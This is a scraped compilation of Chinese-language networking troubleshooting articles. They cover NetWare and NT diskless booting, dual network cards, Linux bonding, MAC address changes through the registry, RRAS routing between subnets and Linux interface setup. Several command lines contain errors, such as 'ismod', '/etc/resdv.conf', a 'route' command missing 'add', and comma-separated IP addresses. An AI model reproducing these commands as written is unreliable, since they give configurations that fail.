    经过:我厂自从安装NetWare 4.11服务器以来，一直使用双网卡，网卡用过几种牌子，比如3COM，TP-LIN，有ISA插槽也有PCI插槽，但都能正常工作。最后选用的是两个TP-LINK的自适应100MB网卡，型号是TF-3275，后来由于Y2K及其他的一些问题，打了补丁NW4SP7.EXE，至此网卡运行一直稳定。近期由于重新装机(硬件都没变)，用原版光盘进行安装后，采用NW4SP8.EXE打补丁，按道理NW4SP8.EXE 比NW4SP7.EXE版本高，本应不会出现问题，但每次开机只有一个网卡可正常使用，另一个网卡不能使用，在加载Load Monitor，选择LAN/WAN Information选项，查网卡信息统计，发现total packets sent(已发送包总数)有数据，而total packets received(已接收包总数)为0，曾怀疑网卡有问题，换新网卡，故障依旧，更换插槽，故障还是不能排除。检查补丁说明，该做的都做了，还是不行。正好公司有一部刚装的新机，网卡也是新的，按正常安装打补丁，运行后同原服务器故障基本相同，只不过total packets sent(已发送包总数)和total packets received(已接收包总数)数据为0的位置有时对调。至此可以肯定硬件没有问题。上网查阅，又有NW4SP8A.EXE补丁发行，下载(那可是70多MB的大东东)打补丁，问题毫无起色，请教了几位工程师(其实我也是CNE呀)也是不了了之。
    问题解决:
    无奈只有重新再开机，观察模块加载情况，发现有一些补丁模块的加载是在网卡驱动加载之后，而此时出现的网卡不正常结果正如前所述。估计另一网卡的加载需要加载一些打补丁后的一些模块，基于这种想法，打开文件AUTOEXEC、NCF进行检查:(……为省略的一些命令行，MX32SODI、LAN为TP-LINK网卡的驱动)
    ……
    LOAD MX32SODI slot=1 FRAME=Ethernet_802.2 NAME=MX32SODI_1_E82
    BIND IPX MX32SODI_1_E82 NET=CEE71118
    LOAD MX32SODI slot=1 FRAME=Ethernet_802.3 NAME=MX32SODI_1_E83
    BIND IPX MX32SODI_1_E83 NET=CEE71117
    ……
    LOAD IPXRTR routing=NLSP
    MOUNT ALL
    ……
    如上所见LOAD IPXRTR routing =NLSP位于网卡加载后才加载。于是把
    LOAD IPXRTR routing =NLSP 调到网卡加载之前，重新启动服务，问题解决。

返回


NT网卡和Novell网卡互用

《一键清理系统垃圾》

NT网卡和Novell网卡互用

     最近为一家电脑培训中心建立一个无盘NT教学网，由于NT无盘工作站上的网卡有着严格的要求：网卡的卡号（Adapter ID，也就是Node Address，共占12个字节）的前6个字符，必须是以0020AF或00608C开头， 且网卡上必须安装RPL（Remote Initial Program Load)的方式运行且支持NT的Boot Rom(其中记录着与NT通信的程序）才能为NT远程启动服务器所标识。我们建造的NT教学网上的工作站用的网卡符合上述要求，建立的无盘NT教学网， 一直运行正常。 后由于无盘 NT 工作站运行速度太慢， 想改成 Novell无盘教学网，结果发现在无盘NT教学网上运行正常的工作站竟然不能登录 Novell 3.12、Novell 4.10、Novell 4.11中文版服务器；后来另外一家公司为了培训 Microsoft系列办公软件的需要（经多次试验，在Novell无盘站上只能运行Windows3.X，不能运行 Windows95），必须把一个Novell无盘教学网改成无盘NT教学网，结果又惊奇地发现，在Novell无盘教学网上登录正常的无盘工作站同样也无法登录NT Server4.0服务器。经过多次试验， 笔者摸索出了一个方法：使网卡的卡号不是0020AF或00608C的支持RPL Boot Rom网卡且带有支持NT的Boot Rom的网卡也能成功地登录NT无盘网络；同样 NT专用网卡也能成功地登录Novell无盘网络。现把详细步骤介绍如下。

    一、使不符合NT要求的网卡成功登录NT服务器

    目前，NT“远程启动服务”只支持如下的的网卡：

    如果NT服务器“远程启动服务”不支持您的网卡品牌与型号，或者即使 “远程启动服务”支持您的网卡品牌与型号，但是您的网卡的Adapter ID前六个字符不以0020AF或00608C开头，这时您可利用NT安装目录下的RPLCMD.EXE来使NT支持您的网卡。RPLCMD.EXE使用 方法如下：在DOS提示符下输入如下的命令：

    RPLCMD ［\\服务器计算机名］

    这时在屏幕上会出现如下的命令选项：

    Adapter Boot Config Profile Service Vender Wksta ［quit］

    其中：

    Adapter用来修改工作站第一次启动时将Adapter ID 传给服务器的记录，此记录是一个不完整的记录；

    Boot 修改Boot block记录，其具体内容为网卡品牌和使用哪个DOSBB.cnf。

    Config 修改配置记录。

    Profile 修改配置文件

    Service 控制远程启动服务

    Vender 设置网卡厂商的名称或卡号的前6位码。

    Wksta 修改工作站记录

    根据远程启动工作站是使用MS-DOS、windows3.X，还是使用Windows95而采用不同的方法。比较而言，安装远程MS-DOS、Windows3.X工作站相对简单，而安装 Windows95工作站却要复杂地多。下面分两种情况阐述：

    ■为MS-DOS、Windows3.X工作站添加网卡

    第①步：将新的网卡的驱动程序复制到\winnt\rpl\bblock\ndis目录中，一般其文件扩展名为.dos。其中，winnt是安装Windows NT时所选择的目录名，以下相同。

    第②步：添加一个\winnt\rpl\bblock\netbeui\adapter 目录， 其中adapter 为网卡的名称， 在此目录中必须包含以下两个文件： dosbb. cnf 和 protocol.ini。随网卡带的驱动程序盘中有这两个文件，直接复制到此目录中既可。

    第③步：利用rplcmd.exe程序，添加此网卡的厂商数据：

    c:\winnt>rplcmd

    Adapter Boot Config Profile Service Vender Wksta ［Quit］

    Add Del Enum: a

    VenderName=00b897(我的网卡的Adapter ID的前六位字符）

    VenderComment=TopStar TE-2000B

    其中VenderName的00b897为所添加网卡的卡号的前6位码； VenderComment为注释说明。

    第④步：添加网卡的bblock：

    c:\winnt>rplcmd

    Adapter Boot Config Profile Service Vender Wksta ［Quit］

    Add Del Enum: a

    BootName=DOSTOPSTAR

    VenderName=00b897

    BbcFile=bblock\netbeui\dirname\dosbb.cnf

    BootComment=DOS TopStar TE-2000B

    Windowsize=0

    其中BootName的值可以任意设置，VenderName的00b897与第③步的VenderName必须相同；BbcFile中的dirname为目录名称，不同的网卡会有不同的名称；BootComment为注释说明。

    第⑤步：添加网卡的配置

    c:\winnt>rplcmd

    Adapter Boot Config Profile Service Vender Wksta ［Quit］

    Add Del Enum: a

    ConfigName=DOS622_TopStar

    BootName=DOSTOPSTAR

    DirName=DOS

    DirName2=DOS622

    FitShared=fits\dos622.fit

    Fitpersonal=fits\dos622p.fit

    ConfigComment=DOS6.22 for TopStar TE-2000B

    其中ConfigName的值可以任意设置；BootName 必须与第④步所设置的值相同。

    第⑥步：执行“远程启动管理器→配置→检查配置”。

    ■为Windows95工作站添加网卡

    第①步：先按以上的方法把工作站设置成DOS工作站；

    第②步：将\winnt\rpl\bblock\netbeui\adapter目录中的DOSBB.CNF复制成W95BB.CNF，其中adapter为网卡的名称。

    第③步：修改 W95BB.CNF，将

    EXE BBLOCK\I13.COM

    改成： EXE BBLOCK\W95I13.COM

    第④步：添加网卡的bblock：

    c:\winnt>rplcmd

    Adapter Boot Config Profile Service Vender Wksta ［Quit］

    Add Del Enum: a

    BootName=W95X

    VenderName=00b897

    BbcFile=bblock\netbeui\dirname\W95bb.cnf

    BootComment=DOS TopStar TE-2000B

    Windowsize=0

    其中BootName的值可以任意设置，其余可见前面的解释。

    第⑤步：添加网卡的配置

    c:\winnt>rplcmd

    Adapter Boot Config Profile Service Vender Wksta ［Quit］

    Add Del Enum: a

    ConfigName=W95X

    BootName=W95X

    DirName=DOS

    DirName2=WIN95(必须输入WIN95，不能写成其它名)

    FitShared=fits\win95.fit

    Fitpersonal=fits\win95p.fit

    ConfigComment=W95 for TopStar TE-2000B

    其中ConfigName的W95X可以任意设置；BootName必须与第④步所设置的名称相同。

    第⑥步：执行“远程启动管理器→配置→检查配置”。

    二、使NT专用网卡用在Novell无盘网上

    当用NT专用网卡用在Novell无盘网上时，会在屏幕上显示如下的信息（我用的网卡是 Topstar TE-2000B ， 网卡上的 RPL ROM 是 ShangHai Scientific Electronics CO. LTD公司生产的NT专用ROM)：

    NT RPL BootROM v1.00 (920626)

    D-link DE-250 BootROM Driver MLID v2.02(931101)

    Copyright(C) D-Link Coorperation 1994.All right reserved.

    What Server will been found,please select a number which you want?

    1.NetWare PRL Server

    2.IBM LAN Server3.0

    3.IBM LAN Server4.0

    4.MS LAN MAN Server

    5.The first available Server

    If no key mapping,system will select 5 after 5 seconds.

    RPL-ROM-ADR:0000 2101 183f

    RPL-ROM-IRQ:3

    RPL-ROM-PIO:0300

    RPL-ROM-FFC:此数不停地增长。

    等了很长的时间，工作站都无法登录上Novell 3.12、 Novell 4. 10 、 Novell 4.11中文版服务器。这时在服务器上的Autoexec.cnf文件中添加如下的两个命令行，或在服务器的控制台上输入如下的两个命令行，既可解决问题：

    Load rpl

    Bind rpl to Ne2000

    其中，Ne2000是工作站网卡的驱动程序名，不同的网卡会有不同的名称。如果网卡的RPL ROM是Novell专用的，如上两句不须添加。

返回


解决网卡“记忆效应”惹出断网问题

《一键清理系统垃圾》

解决网卡“记忆效应”惹出断网问题

  最近，学校决定对办公室布局加以改造，这样办公室中已经联网的两台计算机必须重新调整位置。在调整之前，这两台计算机均能正常上网。为了保证两台计算机能够共享办公室中惟一的一个网线插座，我们将这两台计算机放在了一起。正确进行物理连接并设置参数后，分别打开两台计算机，发现甲计算机可以正常上网，乙计算机却无法连接到Internet
上。检查交换机端和乙计算机对应端口的指示灯，发现指示灯不亮。

    笔者仔细分析了上面的现象，认为甲计算机既然能上网，就表明办公室中的网线插座和交换机本身没有硬件方面的问题，于是笔者将目光聚焦在乙计算机以及该计算机到交换机之间的网络连接上面。笔者首先找来了测线仪，对乙计算机到交换机之间的网络线进行了测试，测试结果排除了网络不通的原因。

    会不会是网络线连接两端的接口有问题呢？为了验证交换机上的网络连接端口是否有效，笔者先将交换机端甲计算机对应的网线接头接插在乙计算机对应接口上，结果发现甲计算机能够正常上网，显然交换机的端口是没有问题的；接着检查乙计算机这边的网线水晶头，没有发现接触不良的现象。笔者又对乙计算机查杀病毒，可杀毒后依旧不能上网，很明显故障与病毒无关。

    就在万般无奈之下，突然想到乙计算机的“主人”由于忙着要处理手头的材料，在笔者将网线插入到网卡之前，乙计算机已经启动并运行了，而甲计算机当时是关闭的。笔者马上在乙计算机这边同样操作：先将乙计算机上的网线拔下来，然后再关闭这台计算机，再关闭那台计算机，之后重新将网线插入到这台计算机的网卡中，并重新启动该计算机。启动成功后，打开浏览器，发现上网恢复正常！

    总结上面的故障原因，笔者认为很有可能是在开机状态下，网卡与交换机相互连接时，网卡的参数信息被交换机内部的电路触发，造成了工作的“不稳态”，网卡对这种“不稳态”产生了“记忆效应”，致使不能正常进行网络连接。一般来说，使用知名的、质量好的网卡或者交换机，就很难碰到上面的奇怪现象。


局域网故障排除的经验之谈网卡是关键

《一键清理系统垃圾》

局域网故障排除的经验之谈网卡是关键

  作为一名计算机教师，上课时既要保证课堂教学质量，又要维护好网络，从而保证教学工作的顺利进行。下面是本人在工作中积累的排除局域网故障的经验谈，希望能对同行们有所帮助。

    我们知道，网络故障可分为硬件故障和软件故障两大类。当排除了所有的硬件故障后，我们就要把焦点转移到软件设置上。关于局域网的软件问题引起网络故障的例子很多，但
多数集中在网卡的设置上。

    实例一，如果在Windows 98的“网上邻居”中找不到域及服务器，但可找到其他的工作站，这个问题产生的原因是登录的连接速度设置不对，解决的办法如下：

    1.在“开始”菜单中选择“设置”，进入到“控制面板”中。

    2.在“控制面板”中找到“网络”图标，双击进入。

    3.在“网络”窗口中找到“网络用户”，选择“属性”。

    4.在“属性”窗口的“网络登录选项”中，选择“快速登录”。

    至此，问题就能够得到解决了。

    实例二，我们在“网上邻居”中浏览时经常只能找到本机的机器名，但无法通过网络查找到其他的计算机。这种情况说明您本机的网卡没有问题，可能的原因是：

    1.添加的协议不全。

    2.没有在启动时正确地登录网络。

    实例三，Ping命令可以测试两个点之间的通讯是否正常，Ping的对象可以是对方的IP地址或是计算机名。但有的时候可以Ping通IP地址，但Ping不通计算机名。

    我们应该首先检查如下的设置：TCP/IP协议中的“DNS设置”不正确，请检查其中的配置。对于对等网，“主机”应该填写自己机器本身的名字，“域”不需填写，DNS服务器应该填写自己的IP。而对于服务器/工作站网，“主机”应该填服务器的名字，“域”填写局域网服务器设置的域，DNS服务器应该填写服务器的IP。

    实例四，有时网络上的其他计算机无法与我的计算机连接，且无法访问我计算机上的资源。解决方法如下：

    1.确认是否安装了该网络使用的网络协议。如果要登录NT域，还必须安装NetBEUI协议。

    2.是否安装并启用了文件和打印机共享服务。只有提供了服务才能允许别人访问您的计算机和共享打印机。

    3.如果是要登录NT服务器网络，在“网络”属性的“主网络登录”中，应该选择“Microsoft网络用户”。

    4.如果要登录NT服务器网络，在“网络属性”框的“配置”选项卡中，双击列表中的“Microsoft网络用户”组件，检查是否已选中“登录到Windows域”复选框，并检查“Windows域”下的域名是否正确。


如何实现多网卡bonding

《一键清理系统垃圾》

如何实现多网卡bonding

    使用多块网卡虚拟成为一块网卡，具有相同的IP地址。这项技术其实在sun和cisco中已经存在，分别称为Trunking和etherchannel技术，在Linux中，这种技术称为bonding。
    因为bonding在内核2.4.x中已经包含了，只需要在编译的时候把网络设备选项中的Bonding driver support选中就可以了。
    然后，重新编译核心，重新起动计算机，执行如下命令：
ismod bonding
ifconfig eth0 down
ifconfig eth1 down
ifconfig bond0 ipaddress
ifenslave bond0 eth0
ifenslave bond0 eth1
    现在两块网卡已经象一块一样工作了.这样可以提高集群节点间的数据传输.
    你最好把这几句写成一个脚本,再由/etc/rc.d/rc.local调用,以便一开机就生效.
    bonding对于服务器来是个比较好的选择,在没有千兆网卡时,用两三块100兆网卡作bonding,可大大提高服务器到交换机之间的带宽.但是需要在交换机上设置连接bonding网卡的两个口子映射为同一个虚拟接口。

返回


双网卡的安装与设置

《一键清理系统垃圾》

双网卡的安装与设置

    对于大多数中小型企业来说，要实现整个局域网内的机器共享上网，比如接入ADSL，就需要在服务器上安装双网卡：一块网卡用于外部ADSL接入(可以称之为外网卡)，一块用于内部局域网的互联(可以称之为内网卡)。当然，不单是共享ADSL，共享ISDN、DDN上网都可以。再比如，大家都知道连接一个最小的仅有两台机器的局域网可以不用集线器等网络连接设备，直接用两块网卡互联，那么3台机器呢？其实，我们同样可以通过在其中一台机上安装两块网卡分别与另外两台机相联，从而省下集线器的费用。当然，一机双网卡的用途不仅仅是这些，它还可以做为网桥、网关甚至路由器来使用。下面，我们就来具体看一下怎样在一台计算机上安装和配置两块网卡吧。

    1.选择网卡

    首先，我们应该确定选用什么网卡。一般来说，建议大家选用两块不同型号的网卡。这是因为同型号的网卡在出厂设置时其占用资源，如中断和资源地址，都是相同的，装在同一台机器上很容易出现设备冲突。这里，我们选用“CD-Link”的两块不同型号网卡：EL539TX(REALTEK“8139”主芯片，10M/100M双速自适应PCI以太网卡)和EL520TX(REALTEK“8029AS”主芯片，10M PCI以太网卡)。这是目前市场上应用较为广泛的两款网卡，具有一定的代表性。

    2.双网卡的安装

    选定网卡之后，下一步就是如何安装了。这里，我们以WinXP 上的安装为例来做介绍，其他操作系统上的安装和配置大同小异。

    把两块网卡插入PCI插槽并固定好后，启动WinXP，系统将提示找到新硬件，进入硬件安装向导，系统自动开始复制文件并完成网卡的安装。按照同样的方法，很快可以完成另一块网卡的安装。这时，我们可以看到，在我的电脑→控制面板→系统→硬件→设备管理器的“网卡”项目中，已经有了这两块网卡的标识(Realtek RTL8029AS PCI Ethernet Adapter和Realtek RTL8139A Fast Ethernet Adapter) ，并且属性都正常。这就表明，这两块网卡已成功安装，下面的任务就是分别对它们进行设置了。

    3.双网卡的设置

    打开我的电脑→控制面板→网络和拨号连接(或直接在桌面上打开网上邻居属性)，可以看到其中多了两个本地连接图标，系统将其识别为“本地连接1”和“本地连接2”。

    首先，对本地连接1进行设置：打开“本地连接1”的属性，可以看到，此连接所用的网卡(EL520TX)，以及连接所使用的网络组件(客户，服务，协议等)。一般来说，以下组件是必不可少的：Microsoft网络客户端(客户)，Microsoft网络的文件和打印机共享(服务)， Internet协议(TCP/IP)。如果以上组件缺少或还需要其他的网络组件，可以直接选“安装” 来添加。

    选择Internet 协议(TCP/IP),点属性，进入TCP/IP协议的属性设置窗口。关于TCP/IP 协议的属性设置，有一点需要说明的就是不同的TCP/IP协议应有不同的设置。比如，用于ADSL共享的外部接入网关(即此网卡所接的网线是ADSL外部接入)的设置为：

    IP 地址：202,18,04,57，子网掩码：255,255,255,0，默认网关：202,18,111,21,DNS(域名服务器)：202,18,111,21

    注意，此处的IP地址、子网掩码、网关和DNS服务器等设置，由当地 ISP(一般来说是当地的电信局)提供，具体情况应向他们咨询。这里的设置仅做参考。

    然后是“本地连接2“的设置。此连接用的网卡是内网卡EL539TX，也就是说这个连接是同内部局域网相连的。其TCP/IP属性设置如下：

    IP地址：192,168,0，1，子网掩码：255,255,255,0，网关为空，DNS服务器为：202,96,134,133

    好了，说了这么多，关于一机双网卡的安装和设置总算是讲完了。当然，对于一些具体应用，其完全设置当然不是这么简单，比如ADSL共享上网吧，设置双网卡后，还需要使用代理服务器软件或Win9X和Win2000系统所带的网络附件“Internet连接共享”，这些也都是需要设置的。还有局域网内其他工作站的设置


我的网卡怎么了？

《一键清理系统垃圾》

我的网卡怎么了？

《中国电脑教育报》杨勇

    Windows操作系统的双机互连大家都会，可我差一点在这种简单问题上栽跟头，问题出在网卡的设置上。

    连网的两台兼容机中，一台使用Windows NT Server 4.0，用来做服务器；而另一台使用Windows 98。硬件配置上除了后者有一块ALS4000 PCI声卡以外，其余都是相同的，网卡都采用RTL8019芯片的KE-2008网卡。

    以前，两台电脑的网卡全都使用NE2000的兼容驱动程序，它们之间连网非常简单。一日，我从网上下载了网卡的设置程序即8019set.exe，利用这个程序对客户机网卡的默认设置进行了修改，其中也包括了将这块网卡从不支持即插即用默认的NE2000兼容方式改为使用即插即用的状态。然后删除了原来的NE2000兼容驱动程序。当重新启动电脑时，Windows 98顺利地找到了新硬件并且为找到的RTL8019网卡安装了自带的驱动程序。似乎一切都很完美。

    过了两天，两台电脑之间需要传递一些比较大的数据，可是当我打开网上邻居时，发现其中并没有熟悉的服务器的身影，而服务器中却可以发现客户机，但是双击不能打开，提示找不到客户机的路径。因为曾经使用正常，所以排除了硬件损坏的可能。也许是BIOS设置的问题，我进入BIOS设置程序中，发现一切正常。我满头大汗，后来静下心来仔细一想，既然服务器中可以看到客户机，而客户机中看不到服务器，说明故障的原因在客户机上，而且和网卡设置应该有极大的关系。想到这，我打开网卡的属性对话框，发现网卡使用了5号中断，而且提示无任何冲突。突然间我想起来，客户机开机时显示5号中断被ACPI控制器占用，而声卡使用的是10号中断，却没有网卡的影子。而在Windows 98中系统分配给网卡使用的正是5号中断。既然5号中断不好使，那么就试试经典中断3（客户机中的中断3是空闲的，被COM2占用）吧。于是我将网卡的中断号改为3，顺便将地址也改成了0300-031F。重新启动电脑，在网上邻居中终于看到了服务器的影子，而服务器那端双击客户机图标也能够正常使用了。


修改网卡物理地址的方法

《一键清理系统垃圾》

修改网卡物理地址的方法

    更改网卡 MAC 地址的文章我曾经见过不少，但是都说的不够全面，下面我试着将各种方法总结出来，希望对大家有所帮助。

    一、简单的修改方法

    其实不论 98 还是 2000 ，自身都已经提供了更改网卡地址的功能，只是平时大家都没上这方面想，因此没有注意到而以，很简单的哦 .....

    现在我们先来看看 WIN2000 。在桌面上的网上邻居图标上单击右键，选择“属性”，在弹出的“网络和拨号连接”窗口中一般有两个图标，一个是“新建连接”图标，一个是“我的连接”图标。当然了，如果你的机器上有两个网卡的话，那就有三个图标了。现在假设你只有一个网卡，那就在“我的连接”图标上单击右键，选择“属性”，这时会弹出一个“我的连接属性”的窗口。在窗口下面有一个“配置”按钮，点击该按钮后就进入了网卡的属性对话框了，这个对话框中有五个属性页，点击第二项“高级”页，在“属性”标识下有两项或多项，现在你应该能看到一个叫“ Network Address ”的属性项了吧，点击该项，在对话框右边的“值”标识下有两个单选项，默认是“不存在” ，现在你只要选中上面一个单选项，然后在右边的框中输入你想改的网卡 MAC 地址（注意要连续输入，不要带“－”），如“ 00E0404000A0 ”，点“确定”， OK ！你已经大功告成了！

    在 98 下面的修改和 WIN2000 下差不多。在“网上邻居”图标上单击右键，选择“属性”，弹出一个“网络”对话框，在“配置”框中，双击你要修改的网卡，出来一个网卡属性对话框。在“高级”选项中，也是点击“属性”标识下的“ Network Address ”项，在右边的两个单选项中选择上面一个，再在框中输入你要修改的网卡 MAC 地址，点“确定”后，系统会提示你重新启动。接下来就不用我说了吧！：）（重启后你可以用“ winipcfg ”看看修改的结果）

    如果你想把网卡的 MAC 地址恢复原样，只要选择“ Network Address ”项右边的“没有显示”再重新启动即可。在 WIN2000 下面是选择“不存在”，当然也不用重新启动了。

     二、注册表修改的方法

    由于驱动或网卡的关系，有的机器中没有“ Network Address ”项，那我们只有通过修改注册表来进行修改了。

    ◆ Windows2000 的修改

    1 、在 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000 、 0001 、 0002 等主键下，查找 DriverDesc ，内容为你要修改的网卡的描述，如“ Realtek RTL8029(AS)-based PCI Ethernet Adapter ”。

    2 、在其下，添加一个字符串，命名为 NetworkAddress ，其值设为你要的 MAC 地址（注意地址还是连续写）。如： 00E0DDE0E0E0 。

    3 、然后到其下 Ndi\params 中添加一项名为 NetworkAddress 的主键，在该主键下添加名为 default 的字符串，其值是你要设的 MAC 地址，要连续写，如： 000000000000 。（实际上这只是设置在后面提到的高级属性中的“初始值”，实际使用的 MAC 地址还是取决于在第 2 点中提到的 NetworkAddress 参数，这个参数一旦设置后，以后高级属性中的值就是 NetworkAddress 给出的值而非 default 给出的了。）

    4 、在 NetworkAddress 的主键下继续添加名为 ParamDesc 的字符串，其作用为指定 NetworkAddress 主键的描述，其值可自己命名，如“ Network Address ”，这样在网卡的高级属性中就会出现 Network Address 选项，就是你刚在注册表中加的新项 NetworkAddress ，以后只要在此修改 MAC 地址就可以了。继续添加名为 Optional 的字符串，其值设为“ 1 ”，则以后当你在网卡的高级属性中选择 Network Address 项时，右边会出现“不存在”选项。

    5 、重新启动你的计算机，打开网络邻居的属性，双击相应网卡项会发现有一个 Network Address 的高级设置项，可以用来直接修改 MAC 地址或恢复原来的地址。

    ◆ Win9x 的修改

    1 、在 HKEY_LOCAL_MACHINE\system\Currentcontrolset\services\class\net\0000 、 0001 、 0002 等下，找到 DriverDesc 字符串。

    2 、在其下，添加一个字符串，名字为 NetworkAddress ，其值设为你要的 MAC 地址，注意要连续写。如： 00E0DDE0E0E0 。

    3 、然后到其下 Ndi\params 中添加一项名为 NetworkAddress 的主键，在该主键下添加名为 default 的字符串，其值写你要设的 MAC 地址，注意要连续的写，如 00E0DDE0E0E0 。

    4 、继续添加名为 ParamDesc 的字符串，其作用为指定 NettworkAddress 主键的描述，其值可自己命名，如“ Network Address ”，这样以后打开网络邻居的属性，这样在网卡的高级属性中就会出现 Network Address 选项，就是你刚在注册表中加的新项 NetworkAddress ，以后只要在此修改 MAC 地址就可以了。

    继续添加名为 Optional 的字符串，其值设为“ 1 ”，则以后当你在网卡的高级属性中选择 Network Address 项时，右边会出现“没有显示”选项。

    ◆ WinNT 下改网卡地址的方法：

    1 、打开注册表，定位到 HKEY_LOCAL_MACHINE->SYSTEM->CurrentControlSet->Services

    2 、找到网卡的键值，在 Parameters 项里添加字串值 NetworkAddress ，其值设为你要修改的 MAC 地址，如：“ 00E0DDE0E0E0 ”。


用单网卡连接两个网段

《一键清理系统垃圾》

用单网卡连接两个网段

    学校有两个计算机教室，各有40台电脑，两个教室通过交换机连接。为了防止学生在网络上私自传送文件，我们将这两个教室的计算机的IP地址设置在不同的网段上。但是新的问题出现了：虽然两个教室隔离开了，但老师们上课传递课件又成了问题，能不能解决这个问题呢？经过一系列的探索，我们采用单网卡实现了两个教室间的通信。

    实现原理

    在没有路由器的情况下，在同一个IP子网内的主机才能通信。主机不在同一网段内，即使通过交换机或集线器连接了也无法相互通信。不信您可以试一下，用两台不同网段IP的主机(如192.168.1.1和192.168.2.1，使用255.255.255.0作为子网掩码)，即使把这两台电脑连接在同一集线器或交换机上，在只使用TCP/IP协议时，它们是无法通信的。

    我们知道，一台计算机是可以有多个IP地址的，如果我们给一台服务器绑定两个以上IP地址，其中一个IP地址在一个网段中(如192.168.1.0)，另一个IP地址在另一个网段中(如192.168.2.0)，如果给服务器提供路由功能，这两个IP地址充当网关，就可以把两个网段连接在一起了。经过查找资料，我们发现Windows 2000 Server具有的“路由和远程访问”服务，能够很好地提供路由功能。

    “路由和远程访问”的配置

    为了解决这个问题，需要在连接这两个教室的交换机或集线器上安放一台使用静态IP地址的服务器。这台服务器需要至少指定两个IP地址，一个IP地址处在一个教室计算机所在的网段中，另一个IP地址处在另一个教室计算机所在的网段中。

    在默认状态下，Windows 2000 Server已经安装了“路由和远程访问”服务，只是没有配置好，所以需要进行相关设置：

    1、 在服务器上以管理员身份登录，点击“开始”，在“程序”组中会有一个“计算机管理”，点击其中的“管理工具”程序组，“管理工具”里面有一个“路由和远程访问”项，找到后点击，在出现的“操作”菜单上点击“配置并启用路由”项，会出现“路由和远程访问服务器安装向导”，按照向导的提示进行操作就可以了。点击[下一步]按钮，出现选择项，我们需要选择的是“网络路由器”，因为我们的目的就是让Windows 2000 Server承担路由器的责任。

    2、点击[下一步]按钮后，会出现确定协议的窗口。现在IPX/SPX协议已经不使用了，而且NetBEUI协议也不是可以路由的协议，所以我们只需要对TCP/IP协议进行路由，选择“是，所有可用的协议都在列表上”就可以了。

    3、点击[下一步]按钮，会出现是否允许远程拨入的选项，因为我们在局域网中，不允许用户从电话线拨入局域网，因此选择“否”就可以了。再点击[下一步]按钮，就会提示设置完成了。点击[完成]按钮之后，会出现“正在启动路由和远程访问服务”的提示。

    设置客户端

    在启用服务后，并不是马上可以使用，而是需要给客户端指定网关的IP地址。因为虽然启动了路由器，但是客户端计算机并不知道路由器(即网关)的IP地址，所以还是无法通信。

    客户端的设置也很简单，假定您使用Windows 98作客户端，在“网上邻居”上右击，在弹出的菜单中点击“属性”，在协议列表中点击“TCP/IP”协议，点击[属性]按钮，就会出现“TCP/IP属性”对话框。在“网关”选项卡中，在“新网关”下面的IP地址栏输入服务器的IP地址，再点击[添加]按钮。服务器有两个IP地址，选择哪一个呢？当然是选择和当前主机在同一个网段的IP地址了。即如果当前主机IP地址是“192.168.1.150”，那么网关的IP地址就是“192.168.1.X”的那个IP地址。当然，这不需要在所有的计算机上设置，只要在需要跨网段通信的计算机上设置就可以了。

    在所有的设置完成之后，现在您用“ping”命令测试一下与另外一个网段的通信是否正常。如果您设置的都正确，通信就会没问题的。

    如何停止服务

    如果想中断两个网段的通信，如何实现呢？这也很好实现：在“路由和远程访问”程序中点击其中的“IP路由选择”，在右边出现的“本地连接”中右击，在弹出的菜单中点击“属性”，会出现一个对话框，在“启用IP路由器管理器”上去掉复选框即可。

    如果您有多个网段，也可以用这个方法实现，原理是一样的。如果两个教室之间的交换机或集线器没有直接连接，此时就需要服务器安装双网卡，每块网卡分别连接到一个教室的交换机或集线器上，再分别指定一个IP地址，再启用“路由和远程访问”服务即可。


在Linux下配置网卡

《一键清理系统垃圾》

返回总目录 上一页 目录页

在Linux下配置网卡

    Linux的真正魅力在于它的网络功能，因而也只有在Internet下才能体验到它的魅力。Linux从诞生开始一直是以网络作为其发展动力的。Linux是一个开放的系统，因而大部分的网卡都得到支持。在Linux下配置网卡一般有两种方法。下面我就分别介绍：
    一、用Linuxconf配置网络
    首先用root身份登录Linux系统，在Gnome环境中，单击脚印按钮，指向“system”，选择“control－panel”子项，然后单击System Configuration图标，也可以在xterm下用＃linuxconf启动Linuxconf。
    1．打开“Networking/Client tasks/Basic host Information”分支，选择Host name标签，输入主机名字（可以不填）；选择Adaptor 1标签，选中“enable”选项，表示能够使用第一个网卡；选择配置方式为Manual；然后分别填写：
    Primary name ＋ domain（主机名.域名），如：webmail.xjtu.edu.cn;
    IP address（主机的IP地址），如：202.117.11.47;
    Net mask（子网掩码），如：255.255.255.0;
    Net device（网络设备名）如：eth0，（Linux下以太网网卡名为eth，第一块为eth0，第二块为eth1，依次类推）；
    Kernel module（内核模块），如果是NE2000的网卡，那么应输入ne； I/O port（I/O端口地址），如0x300；
    IRQ（中断号），如10。I/O端口地址和IRQ中断号可以从Windows中查得，注意IRQ不得与其它设备冲突。
    2．打开“Networking/Client tasks/Name Server Specification（DNS）”分支，弹出“Resolve configuration”对话框，选中“DNS is required for normal operation”后填写：
    Default domain（缺省域名），如：xjtu.edu.cn;
    Nameserver1（第一个DNS服务器的IP地址），我的为202.117.0.20；nameserver 2 （opt）（可选的第二个DNS服务器的IP地址），如：202.117.0.21。
    3．打开“Config/Networking/Routing and gateways”选项，弹出Defaults对话框，在Defaultgateway中填写网关IP地址，如：202.117.11.1;选中“enable routing”选项。
    最后接受以上填写值，激活并退出。
    二、基于命令行方式的手工配置方法
    手工方法是在以太网卡已装入的情况下编辑配置文件来配置网络的方法。具体步骤如下：
    1．编辑/etc/rc.d/rc.local文件
    在该文件中加入类似下列各行（＃号以后为注释，下同）:
    ＃配置第一个以太网卡eth0的IP地址，子网掩码，UP起激活作用
    /sbin/ifconfig，etho 202.117.11.47 netmask 255.255.255.0 UP
    ＃配置并激活回环设备lo
    /sbin/ifconfig lo 127.0.0.1 UP
    /sbin/route add host 127.0.0.1 lo
    ＃让Linux将本地网的信息发送到eth0接口
    /sbin/route add net 202.117.11.47 netmask 255.255.255.0 eth0
    ＃指定访问远程网络的缺省网关
    /sbin/route default gw 202.117.11.1 eth0
    2．编辑/etc/resdv.conf
    该文件作用是设置域名服务器。加入下面内容
    ＃指定本机域名
    Domain xjtu.edu.cn
    ＃域名称服务器（DNS）
    Nameserver 202.117.0.20
    Nameserver 202.117.0.21
    3．编辑/etc/hosts.conf文件
    设置主机文件表。可加入如下行：
    order hosts，bind
    multi on
    202.117.11.47 webmail.xjtu.edu.cn webmail
    第一行表示：查找名称时，首先检查本地hosts文件，然后按/etc/resolv.conf所指定的Nameservers顺序查找。重新启动就可以了。


网卡故障

《一键清理系统垃圾》
